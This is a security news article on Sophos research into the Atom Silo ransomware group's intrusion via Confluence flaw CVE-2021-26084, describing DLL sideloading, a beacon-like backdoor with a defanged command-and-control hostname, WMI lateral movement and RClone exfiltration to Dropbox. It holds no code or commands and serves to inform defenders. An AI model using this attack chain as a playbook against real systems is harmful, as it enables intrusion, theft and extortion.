A recently emerged ransomware group called Atom Silo has been exploiting a recently disclosed RCE flaw in Atlassian’s Confluence collaboration software to deploy their ransomware payloads.
The vulnerability, which Atlassian patched last month, is tracked as CVE-2021-26084 and allows a remote attacker to execute arbitrary code by performing the Object-Graph Navigation Language (OGNL) injection.
The discovery was made by Sophos’ MTR Rapid Response team while investigating a recent ransomware attack involving Atom Silo. While the ransomware is very similar to the LockFile ransomware, the threat actor used several novel techniques, including the side-loading of malicious dynamic-link libraries designed to disrupt endpoint protection software.
The attack itself was performed in two stages. The intrusion stage took place on September 13, 11 days prior to ransomware attack. To gain initial access to the target system the treat actors exploited CVE-2021-26084 in a Confluence server to create a backdoor that allowed them to deploy another backdoor.
The payload dropped for the second backdoor consisted of three files, one of which was a legitimate, signed executable from a third-party software provider that is vulnerable to an unsigned DLL sideload attack.
“The DLL’s main role is decrypting and loading the backdoor from the third file, mfc.ini. The loaded code then connects to one of several stored hostnames (in this case, update.ajaxrenew[.]com) over TCP/IP port 80. The code appears similar to that of a Cobalt Strike Beacon. Once loaded, the backdoor allowed for remote execution of Windows shell commands through the Windows Management Interface (WMI), in the style of SecureAuth Corp.’s WMIexec penetration testing tool,” Sophos explained.
Within five hours after dropping the DLL, the attackers compromised additional servers and used a compromised administrative account to copy and execute the backdoor binaries using WMI.
Three days later, the threat actor collected data from the security logs to check for user logons and logoffs, account lockouts, the assignment of special privileges to a logon, and use of sensitive privileges, and the local network.
The attackers then used the RClone utility to copy data off the server to a Dropbox account from several directories and connected to the domain controller and dropped their all-in-one attack executable. This executable performed a search for all the domain controllers on a network and created a batch file, which executed the kernel driver to disrupt endpoint protection, and then launched the ransomware.
“The incident investigated by Sophos shows how quickly the ransomware landscape can evolve. This ultra-stealthy adversary was unknown until a few weeks ago,” the researchers noted.
“While similar to another recently discovered ransomware group, LockFile, Atom Silo has emerged with its own bag of novel and sophisticated tactics, techniques and procedures that were full of twists and turns and challenging to spot – probably intentionally so.”
“In addition, Atom Silo made significant efforts to evade detection prior to launching the ransomware, which included well-worn techniques used in new ways. Other than the backdoors themselves, the attackers used only native Windows tools and resources to move within the network until they deployed the ransomware.”